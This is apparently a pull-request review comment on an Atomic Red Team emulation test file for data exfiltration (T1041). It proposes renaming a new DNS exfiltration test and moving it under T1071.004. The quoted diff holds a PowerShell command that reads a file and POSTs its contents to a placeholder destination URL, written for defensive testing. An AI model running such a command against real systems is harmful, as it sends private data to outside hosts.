atomics/T1041/T1041.yaml

```diff
@@ -25,3 +25,44 @@ atomic_tests:
       $filecontent = Get-Content -Path #{filepath}
       Invoke-WebRequest -Uri #{destination_url} -Method POST -Body $filecontent -DisableKeepAlive
     name: powershell
+
+- name: DNS-Based C2 Data Exfiltration
```

Comment:
Since the atomic doesn't emulate C2, I would prefer an alternate and more specific name such as "Text Based Data Exfiltration using DNS subdomains"

Also think this atomic is a better fit in [T10171.004 Application Layer Protocol: DNS](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md)